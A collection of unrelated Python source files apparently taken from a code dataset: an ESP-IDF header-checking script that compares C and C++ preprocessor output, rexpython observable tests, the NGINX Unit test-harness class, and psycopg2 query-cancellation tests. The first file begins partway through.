class HeaderFailedBuildError(HeaderFailed):
def __str__(self):
return "Header Build Error"
class HeaderFailedCppGuardMissing(HeaderFailed):
def __str__(self):
return "Header Missing C++ Guard"
class HeaderFailedContainsCode(HeaderFailed):
def __str__(self):
return "Header Produced non-zero object"
# Creates a temp file and returns both output as a string and a file name
#
def exec_cmd_to_temp_file(what, suffix=""):
out_file = tempfile.NamedTemporaryFile(suffix=suffix, delete=False)
rc, out, err = exec_cmd(what, out_file)
with open(out_file.name, "r") as f:
out = f.read()
return rc, out, err, out_file.name
def exec_cmd(what, out_file=subprocess.PIPE):
p = subprocess.Popen(what, stdin=subprocess.PIPE, stdout=out_file, stderr=subprocess.PIPE)
output, err = p.communicate()
rc = p.returncode
output = output.decode('utf-8') if output is not None else None
err = err.decode('utf-8') if err is not None else None
return rc, output, err
class PublicHeaderChecker:
# Intermediate results
COMPILE_ERR_REF_CONFIG_HDR_FAILED = 1 # -> Cannot compile and failed with injected SDKCONFIG #error (header FAILs)
COMPILE_ERR_ERROR_MACRO_HDR_OK = 2 # -> Cannot compile, but failed with "#error" directive (header seems OK)
COMPILE_ERR_HDR_FAILED = 3 # -> Cannot compile with another issue, logged if verbose (header FAILs)
PREPROC_OUT_ZERO_HDR_OK = 4 # -> Both preprocessors produce zero out (header file is OK)
PREPROC_OUT_SAME_HRD_FAILED = 5 # -> Both preprocessors produce the same, non-zero output (header file FAILs)
PREPROC_OUT_DIFFERENT_WITH_EXT_C_HDR_OK = 6 # -> Both preprocessors produce different, non-zero output with extern "C" (header seems OK)
PREPROC_OUT_DIFFERENT_NO_EXT_C_HDR_FAILED = 7 # -> Both preprocessors produce different, non-zero output without extern "C" (header fails)
def log(self, message, debug=False):
if self.verbose or debug:
print(message)
def __init__(self, verbose=False, jobs=1, prefix=None):
self.gcc = "{}gcc".format(prefix)
self.gpp = "{}g++".format(prefix)
self.verbose = verbose
self.jobs = jobs
self.prefix = prefix
self.extern_c = re.compile(r'extern "C"')
self.error_macro = re.compile(r'#error')
self.error_orphan_kconfig = re.compile(r"#error CONFIG_VARS_USED_WHILE_SDKCONFIG_NOT_INCLUDED")
self.kconfig_macro = re.compile(r'\bCONFIG_[A-Z0-9_]+')
self.assembly_nocode = r'^\s*(\.file|\.text|\.ident).*$'
self.check_threads = []
self.job_queue = queue.Queue()
self.failed_queue = queue.Queue()
self.terminate = Event()
def __enter__(self):
for i in range(self.jobs):
t = Thread(target=self.check_headers, args=(i, ))
self.check_threads.append(t)
t.start()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.terminate.set()
for t in self.check_threads:
t.join()
# thread function process incoming header file from a queue
def check_headers(self, num):
while not self.terminate.is_set():
if not self.job_queue.empty():
task = self.job_queue.get()
if task is None:
self.terminate.set()
else:
try:
self.check_one_header(task, num)
except HeaderFailed as e:
self.failed_queue.put("{}: Failed! {}".format(task, e))
def get_failed(self):
return list(self.failed_queue.queue)
def join(self):
for t in self.check_threads:
while t.isAlive and not self.terminate.is_set():
t.join(1) # joins with timeout to respond to keyboard interrupt
# Checks one header calling:
# - preprocess_one_header() to test and compare preprocessor outputs
# - check_no_code() to test if header contains some executable code
# Procedure
# 1) Preprocess the include file with C preprocessor and with CPP preprocessor
# - Pass the test if the preprocessor outputs are the same and whitespaces only (#define only header)
# - Fail the test if the preprocessor outputs are the same (but with some code)
# - If outputs different, continue with 2)
# 2) Strip out all include directives to generate "temp.h"
# 3) Preprocess the temp.h the same way in (1)
# - Pass the test if the preprocessor outputs are the same and whitespaces only (#include only header)
# - Fail the test if the preprocessor outputs are the same (but with some code)
# - If outputs different, pass the test
# 4) If header passed the steps 1) and 3) test that it produced zero assembly code
def check_one_header(self, header, num):
res = self.preprocess_one_header(header, num)
if res == self.COMPILE_ERR_REF_CONFIG_HDR_FAILED:
raise HeaderFailedSdkconfig()
elif res == self.COMPILE_ERR_ERROR_MACRO_HDR_OK:
return self.compile_one_header(header)
elif res == self.COMPILE_ERR_HDR_FAILED:
raise HeaderFailedBuildError()
elif res == self.PREPROC_OUT_ZERO_HDR_OK:
return self.compile_one_header(header)
elif res == self.PREPROC_OUT_SAME_HRD_FAILED:
raise HeaderFailedCppGuardMissing()
else:
self.compile_one_header(header)
try:
_, _, _, temp_header = exec_cmd_to_temp_file(["sed", "/#include/d; /#error/d", header], suffix=".h")
res = self.preprocess_one_header(temp_header, num, ignore_sdkconfig_issue=True)
if res == self.PREPROC_OUT_SAME_HRD_FAILED:
raise HeaderFailedCppGuardMissing()
elif res == self.PREPROC_OUT_DIFFERENT_NO_EXT_C_HDR_FAILED:
raise HeaderFailedCppGuardMissing()
finally:
os.unlink(temp_header)
def compile_one_header(self, header):
rc, out, err = exec_cmd([self.gcc, "-S", "-o-", "-include", header, self.main_c] + self.include_dir_flags)
if rc == 0:
if not re.sub(self.assembly_nocode, '', out, flags=re.M).isspace():
raise HeaderFailedContainsCode()
return # Header OK: produced zero code
self.log("{}: FAILED: compilation issue".format(header), True)
self.log(err, True)
raise HeaderFailedBuildError()
def preprocess_one_header(self, header, num, ignore_sdkconfig_issue=False):
all_compilation_flags = ["-w", "-P", "-E", "-include", header, self.main_c] + self.include_dir_flags
if not ignore_sdkconfig_issue:
# just strip commnets to check for CONFIG_... macros
rc, out, err = exec_cmd([self.gcc, "-fpreprocessed", "-dD", "-P", "-E", header] + self.include_dir_flags)
if re.search(self.kconfig_macro, out):
# enable defined #error if sdkconfig.h not included
all_compilation_flags.append("-DIDF_CHECK_SDKCONFIG_INCLUDED")
try:
# compile with C++, check for errors, outputs for a temp file
rc, cpp_out, err, cpp_out_file = exec_cmd_to_temp_file([self.gpp, "--std=c++17"] + all_compilation_flags)
if rc != 0:
if re.search(self.error_macro, err):
if re.search(self.error_orphan_kconfig, err):
self.log("{}: CONFIG_VARS_USED_WHILE_SDKCONFIG_NOT_INCLUDED".format(header), True)
return self.COMPILE_ERR_REF_CONFIG_HDR_FAILED
self.log("{}: Error directive failure: OK".format(header))
return self.COMPILE_ERR_ERROR_MACRO_HDR_OK
self.log("{}: FAILED: compilation issue".format(header), True)
self.log(err)
return self.COMPILE_ERR_HDR_FAILED
# compile with C compiler, outputs to another temp file
rc, c99_out, err, c99_out_file = exec_cmd_to_temp_file([self.gcc, "--std=c99"] + all_compilation_flags)
if rc != 0:
self.log("{} FAILED should never happen".format(header))
return self.COMPILE_ERR_HDR_FAILED
# diff the two outputs
rc, diff, err = exec_cmd(["diff", c99_out_file, cpp_out_file])
if not diff or diff.isspace():
if not cpp_out or cpp_out.isspace():
self.log("{} The same, but empty out - OK".format(header))
return self.PREPROC_OUT_ZERO_HDR_OK
self.log("{} FAILED C and C++ preprocessor output is the same!".format(header), True)
return self.PREPROC_OUT_SAME_HRD_FAILED
if re.search(self.extern_c, diff):
self.log("{} extern C present - OK".format(header))
return self.PREPROC_OUT_DIFFERENT_WITH_EXT_C_HDR_OK
self.log("{} Different but no extern C - FAILED".format(header), True)
return self.PREPROC_OUT_DIFFERENT_NO_EXT_C_HDR_FAILED
finally:
os.unlink(cpp_out_file)
try:
os.unlink(c99_out_file)
except Exception:
pass
# Get compilation data from an example to list all public header files
def list_public_headers(self, ignore_dirs, ignore_files, only_dir=None):
idf_path = os.getenv('IDF_PATH')
project_dir = os.path.join(idf_path, "examples", "get-started", "blink")
subprocess.check_call(["idf.py", "reconfigure"], cwd=project_dir)
build_commands_json = os.path.join(project_dir, "build", "compile_commands.json")
with open(build_commands_json, "r") as f:
build_command = json.load(f)[0]["command"].split()
include_dir_flags = []
include_dirs = []
# process compilation flags (includes and defines)
for item in build_command:
if item.startswith("-I"):
include_dir_flags.append(item)
if "components" in item:
include_dirs.append(item[2:]) # Removing the leading "-I"
if item.startswith("-D"):
include_dir_flags.append(item.replace('\\','')) # removes escaped quotes, eg: -DMBEDTLS_CONFIG_FILE=\\\"mbedtls/esp_config.h\\\"
include_dir_flags.append("-I" + os.path.join(project_dir, "build", "config"))
sdkconfig_h = os.path.join(project_dir, "build", "config", "sdkconfig.h")
# prepares a main_c file for easier sdkconfig checks and avoid compilers warning when compiling headers directly
with open(sdkconfig_h, "a") as f:
f.write("#define IDF_SDKCONFIG_INCLUDED")
main_c = os.path.join(project_dir, "build", "compile.c")
with open(main_c, "w") as f:
f.write("#if defined(IDF_CHECK_SDKCONFIG_INCLUDED) && ! defined(IDF_SDKCONFIG_INCLUDED)\n"
"#error CONFIG_VARS_USED_WHILE_SDKCONFIG_NOT_INCLUDED\n"
"#endif")
# processes public include dirs, removing ignored files
all_include_files = []
files_to_check = []
for d in include_dirs:
if only_dir is not None and not os.path.relpath(d, idf_path).startswith(only_dir):
self.log('{} - directory ignored (not in "{}")'.format(d, only_dir))
continue
if os.path.relpath(d, idf_path).startswith(tuple(ignore_dirs)):
self.log("{} - directory ignored".format(d))
continue
for root, dirnames, filenames in os.walk(d):
for filename in fnmatch.filter(filenames, '*.h'):
all_include_files.append(os.path.join(root, filename))
self.main_c = main_c
self.include_dir_flags = include_dir_flags
ignore_files = set(ignore_files)
# processes public include files, removing ignored files
for f in all_include_files:
rel_path_file = os.path.relpath(f, idf_path)
if any([os.path.commonprefix([d, rel_path_file]) == d for d in ignore_dirs]):
self.log("{} - file ignored (inside ignore dir)".format(f))
continue
if rel_path_file in ignore_files:
self.log("{} - file ignored".format(f))
continue
files_to_check.append(f)
# removes duplicates and places headers to a work queue
for f in set(files_to_check):
self.job_queue.put(f)
self.job_queue.put(None) # to indicate the last job
def check_all_headers():
parser = argparse.ArgumentParser("Public header checker file")
parser.add_argument("--verbose", "-v", help="enables verbose mode", action="store_true")
parser.add_argument("--jobs", "-j", help="number of jobs to run checker", default=1, type=int)
parser.add_argument("--prefix", "-p", help="compiler prefix", default="xtensa-esp32-elf-", type=str)
parser.add_argument("--exclude-file", "-e", help="exception file", default="check_public_headers_exceptions.txt", type=str)
parser.add_argument("--only-dir", "-d", help="reduce the analysis to this directory only", default=None, type=str)
args = parser.parse_args()
# process excluded files and dirs
exclude_file = os.path.join(os.path.dirname(__file__), args.exclude_file)
with open(exclude_file, "r") as f:
lines = [line.rstrip() for line in f]
ignore_files = []
ignore_dirs = []
for line in lines:
if not line or line.isspace() or line.startswith("#"):
continue
if os.path.isdir(line):
ignore_dirs.append(line)
else:
ignore_files.append(line)
# start header check
with PublicHeaderChecker(args.verbose, args.jobs, args.prefix) as header_check:
header_check.list_public_headers(ignore_dirs, ignore_files, only_dir=args.only_dir)
try:
header_check.join()
failures = header_check.get_failed()
if len(failures) > 0:
for failed in failures:
print(failed)
exit(1)
print("No errors found")
except KeyboardInterrupt:
print("Keyboard interrupt")
if __name__ == '__main__':
check_all_headers()
|
test_observable.py
|
import logging
import multiprocessing
import sys
import time
from unittest import TestCase
import rexpython as rx
logging.basicConfig(format="%(asctime)-15s %(name)-25s %(levelname)s %(process)d %(message)s")
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
class TestOnError(TestCase):
def test_onerror(self):
def o(em):
try:
raise ValueError("42")
except ValueError:
print "GAGA"
em.onError(sys.exc_info())
rx.Observable.create(o) \
.doOnError(lambda e: log.debug("failed. good. %s" % str(e))) \
.subscribe(rx.LambdaObserver(on_error=lambda e: log.debug("cool. on_error fired"),
on_complete=lambda: self.fail("should fail")
))
def test_onerror_multiprocess(self):
main_pid = multiprocessing.current_process().pid
def o(em):
log.error(main_pid)
log.error(multiprocessing.current_process().pid)
assert main_pid != multiprocessing.current_process().pid
try:
raise ValueError("42")
except ValueError:
log.error("GAGA")
em.onError(sys.exc_info())
log.debug("hello")
d = rx.Observable.create(o) \
.doOnError(lambda e: log.debug("failed. good. %s" % str(e))) \
.subscribeOn(multiprocessing.Process) \
.subscribe(rx.LambdaObserver(on_error=lambda e: log.debug("cool. on_error fired"),
on_complete=lambda: self.fail("should fail")
))
print ("disp", d)
class TestObservable(TestCase):
def test_blockingSubscribe(self):
d = rx.Observable.from_(xrange(1, 4)).blockingSubscribe(
on_next=lambda i: sys.stdout.write("from=%s\n" % i),
on_complete=lambda: sys.stdout.write("!! complete\n")
)
print d
def test_play(self):
def ga(i):
while True:
log.debug("ga %s" % i)
time.sleep(1)
plist = []
for i in xrange(1, 5):
p = multiprocessing.Process(target=ga, args=(i,))
p.start()
plist.append(p)
for pp in plist:
print pp
pp.join()
print "PLAY"
def test_observeOn(self):
def emit(emitter):
"""
:type emitter: rx.ObservableEmitter
"""
emitter.setDisposable(rx.ActionDisposable(lambda: sys.stdout.write("disposed")))
for i in xrange(1, 30):
log.debug("emit %s" % i)
emitter.onNext(i)
time.sleep(1)
emitter.onComplete()
log.info("hello")
log.debug("main process is %s\n" % multiprocessing.current_process().pid)
o = rx.Observable.create(emit).observeOn(multiprocessing.Process)
d = o \
.doOnNext(lambda x: log.debug("doonnext=%s" % x)).map(lambda x: x * 10) \
.blockingSubscribe(on_next=lambda x: log.debug("subscribe x=%s" % x),
on_error=lambda e: log.error("onerror!!!!1111111"))
print "d=", d
# def test_subscribeOn(self):
# def emit(emitter):
# """
#
# :type emitter: rexpython.Emitter
# """
# for i in xrange(1, 40):
# log.debug("emit %s" % i)
# emitter.onNext(i)
# time.sleep(1)
#
# o = rx.Observable.create(emit).doOnNext(lambda x: log.debug("doonnext=%s" % x))
# d = o.subscribeOn(multiprocessing.Process).subscribe(
# rx.LambdaObserver(on_next=lambda x: log.debug("subscribe x=%s" % x)))
# print "d=", d
|
main.py
|
import argparse
import atexit
import fcntl
import os
import platform
import re
import shutil
import signal
import stat
import subprocess
import sys
import tempfile
import time
import unittest
from multiprocessing import Process
class TestUnit(unittest.TestCase):
current_dir = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir)
)
pardir = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)
)
is_su = os.geteuid() == 0
uid = os.geteuid()
gid = os.getegid()
architecture = platform.architecture()[0]
system = platform.system()
maxDiff = None
detailed = False
save_log = False
print_log = False
unsafe = False
def __init__(self, methodName='runTest'):
super().__init__(methodName)
if re.match(r'.*\/run\.py$', sys.argv[0]):
args, rest = TestUnit._parse_args()
TestUnit._set_args(args)
def run(self, result=None):
if not hasattr(self, 'application_type'):
return super().run(result)
# rerun test for each available module version
type = self.application_type
for module in self.prerequisites['modules']:
if module in self.available['modules']:
prereq_version = self.prerequisites['modules'][module]
available_versions = self.available['modules'][module]
if prereq_version == 'all':
for version in available_versions:
self.application_type = type + ' ' + version
super().run(result)
elif prereq_version == 'any':
self.application_type = type + ' ' + available_versions[0]
super().run(result)
else:
for version in available_versions:
if version.startswith(prereq_version):
self.application_type = type + ' ' + version
super().run(result)
@classmethod
def main(cls):
args, rest = TestUnit._parse_args()
for i, arg in enumerate(rest):
if arg[:5] == 'test_':
rest[i] = cls.__name__ + '.' + arg
sys.argv = sys.argv[:1] + rest
TestUnit._set_args(args)
unittest.main()
@classmethod
def setUpClass(cls, complete_check=True):
cls.available = {'modules': {}, 'features': {}}
unit = TestUnit()
unit._run()
# read unit.log
for i in range(50):
with open(unit.testdir + '/unit.log', 'r') as f:
log = f.read()
m = re.search('controller started', log)
if m is None:
time.sleep(0.1)
else:
break
if m is None:
unit._print_log()
exit("Unit is writing log too long")
# discover available modules from unit.log
for module in re.findall(r'module: ([a-zA-Z]+) (.*) ".*"$', log, re.M):
if module[0] not in cls.available['modules']:
cls.available['modules'][module[0]] = [module[1]]
else:
cls.available['modules'][module[0]].append(module[1])
def check(available, prerequisites):
missed = []
# check modules
if 'modules' in prerequisites:
available_modules = list(available['modules'].keys())
for module in prerequisites['modules']:
if module in available_modules:
continue
missed.append(module)
if missed:
print('Unit has no ' + ', '.join(missed) + ' module(s)')
raise unittest.SkipTest()
# check features
if 'features' in prerequisites:
available_features = list(available['features'].keys())
for feature in prerequisites['features']:
if feature in available_features:
continue
missed.append(feature)
if missed:
print(', '.join(missed) + ' feature(s) not supported')
raise unittest.SkipTest()
def destroy():
unit.stop()
unit._check_alerts(log)
shutil.rmtree(unit.testdir)
def complete():
destroy()
check(cls.available, cls.prerequisites)
if complete_check:
complete()
else:
unit.complete = complete
return unit
def setUp(self):
self._run()
def _run(self):
build_dir = self.pardir + '/build'
self.unitd = build_dir + '/unitd'
if not os.path.isfile(self.unitd):
exit("Could not find unit")
self.testdir = tempfile.mkdtemp(prefix='unit-test-')
self.public_dir(self.testdir)
if oct(stat.S_IMODE(os.stat(build_dir).st_mode)) != '0o777':
self.public_dir(build_dir)
os.mkdir(self.testdir + '/state')
with open(self.testdir + '/unit.log', 'w') as log:
self._p = subprocess.Popen(
[
self.unitd,
'--no-daemon',
'--modules', self.pardir + '/build',
'--state', self.testdir + '/state',
'--pid', self.testdir + '/unit.pid',
'--log', self.testdir + '/unit.log',
'--control', 'unix:' + self.testdir + '/control.unit.sock',
'--tmp', self.testdir,
],
stderr=log,
)
atexit.register(self.stop)
if not self.waitforfiles(self.testdir + '/control.unit.sock'):
self._print_log()
exit("Could not start unit")
self.skip_alerts = [
r'read signalfd\(4\) failed',
r'sendmsg.+failed',
r'recvmsg.+failed',
]
self.skip_sanitizer = False
def tearDown(self):
stop_errs = self.stop()
# detect errors and failures for current test
def list2reason(exc_list):
if exc_list and exc_list[-1][0] is self:
return exc_list[-1][1]
if hasattr(self, '_outcome'):
result = self.defaultTestResult()
self._feedErrorsToResult(result, self._outcome.errors)
else:
result = getattr(
self, '_outcomeForDoCleanups', self._resultForDoCleanups
)
success = not list2reason(result.errors) and not list2reason(
result.failures
)
# check unit.log for alerts
unit_log = self.testdir + '/unit.log'
with open(unit_log, 'r', encoding='utf-8', errors='ignore') as f:
self._check_alerts(f.read())
# remove unit.log
if not TestUnit.save_log and success:
shutil.rmtree(self.testdir)
else:
self._print_log()
self.assertListEqual(stop_errs, [None, None], 'stop errors')
def stop(self):
errors = []
errors.append(self._stop())
errors.append(self.stop_processes())
atexit.unregister(self.stop)
return errors
def _stop(self):
if self._p.poll() is not None:
return
with self._p as p:
p.send_signal(signal.SIGQUIT)
try:
retcode = p.wait(15)
if retcode:
return 'Child process terminated with code ' + str(retcode)
except:
p.kill()
return 'Could not terminate unit'
def run_process(self, target, *args):
if not hasattr(self, '_processes'):
self._processes = []
process = Process(target=target, args=args)
process.start()
self._processes.append(process)
def stop_processes(self):
if not hasattr(self, '_processes'):
return
fail = False
for process in self._processes:
if process.is_alive():
process.terminate()
process.join(timeout=15)
if process.is_alive():
fail = True
if fail:
return 'Fail to stop process'
def waitforfiles(self, *files):
for i in range(50):
wait = False
ret = False
for f in files:
if not os.path.exists(f):
wait = True
break
if wait:
time.sleep(0.1)
else:
ret = True
break
return ret
def public_dir(self, path):
os.chmod(path, 0o777)
for root, dirs, files in os.walk(path):
for d in dirs:
os.chmod(os.path.join(root, d), 0o777)
for f in files:
os.chmod(os.path.join(root, f), 0o777)
def _check_alerts(self, log):
found = False
alerts = re.findall('.+\[alert\].+', log)
if alerts:
print('All alerts/sanitizer errors found in log:')
[print(alert) for alert in alerts]
found = True
if self.skip_alerts:
for skip in self.skip_alerts:
alerts = [al for al in alerts if re.search(skip, al) is None]
if alerts:
self._print_log(log)
self.assertFalse(alerts, 'alert(s)')
if not self.skip_sanitizer:
sanitizer_errors = re.findall('.+Sanitizer.+', log)
if sanitizer_errors:
self._print_log(log)
self.assertFalse(sanitizer_errors, 'sanitizer error(s)')
if found:
print('skipped.')
@staticmethod
def _parse_args():
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument(
'-d',
'--detailed',
dest='detailed',
action='store_true',
help='Detailed output for tests',
)
parser.add_argument(
'-l',
'--log',
dest='save_log',
action='store_true',
help='Save unit.log after the test execution',
)
parser.add_argument(
'-r',
'--reprint_log',
dest='print_log',
action='store_true',
help='Print unit.log to stdout in case of errors',
)
parser.add_argument(
'-u',
'--unsafe',
dest='unsafe',
action='store_true',
help='Run unsafe tests',
)
return parser.parse_known_args()
@staticmethod
def _set_args(args):
TestUnit.detailed = args.detailed
TestUnit.save_log = args.save_log
TestUnit.print_log = args.print_log
TestUnit.unsafe = args.unsafe
# set stdout to non-blocking
if TestUnit.detailed or TestUnit.print_log:
fcntl.fcntl(sys.stdout.fileno(), fcntl.F_SETFL, 0)
def _print_log(self, data=None):
path = self.testdir + '/unit.log'
print('Path to unit.log:\n' + path + '\n')
if TestUnit.print_log:
if data is None:
with open(path, 'r', encoding='utf-8', errors='ignore') as f:
data = f.read()
print(data)
|
test_cancel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# test_cancel.py - unit test for query cancellation
#
# Copyright (C) 2010-2011 Jan Urbański <[email protected]>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import threading
import psycopg2
import psycopg2.extensions
from psycopg2 import extras
from testconfig import dsn
from testutils import unittest, ConnectingTestCase, skip_before_postgres
class CancelTests(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
cur = self.conn.cursor()
cur.execute('''
CREATE TEMPORARY TABLE table1 (
id int PRIMARY KEY
)''')
self.conn.commit()
def test_empty_cancel(self):
self.conn.cancel()
@skip_before_postgres(8, 2)
def test_cancel(self):
errors = []
def neverending(conn):
cur = conn.cursor()
try:
self.assertRaises(psycopg2.extensions.QueryCanceledError,
cur.execute, "select pg_sleep(60)")
# make sure the connection still works
conn.rollback()
cur.execute("select 1")
self.assertEqual(cur.fetchall(), [(1, )])
except Exception, e:
errors.append(e)
raise
def canceller(conn):
cur = conn.cursor()
try:
conn.cancel()
except Exception, e:
errors.append(e)
raise
thread1 = threading.Thread(target=neverending, args=(self.conn, ))
# wait a bit to make sure that the other thread is already in
# pg_sleep -- ugly and racy, but the chances are ridiculously low
thread2 = threading.Timer(0.3, canceller, args=(self.conn, ))
thread1.start()
thread2.start()
thread1.join()
thread2.join()
self.assertEqual(errors, [])
@skip_before_postgres(8, 2)
def test_async_cancel(self):
async_conn = psycopg2.connect(dsn, async=True)
self.assertRaises(psycopg2.OperationalError, async_conn.cancel)
extras.wait_select(async_conn)
cur = async_conn.cursor()
cur.execute("select pg_sleep(10000)")
self.assertTrue(async_conn.isexecuting())
async_conn.cancel()
self.assertRaises(psycopg2.extensions.QueryCanceledError,
extras.wait_select, async_conn)
cur.execute("select 1")
extras.wait_select(async_conn)
self.assertEqual(cur.fetchall(), [(1, )])
def test_async_connection_cancel(self):
async_conn = psycopg2.connect(dsn, async=True)
async_conn.close()
self.assertTrue(async_conn.closed)
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.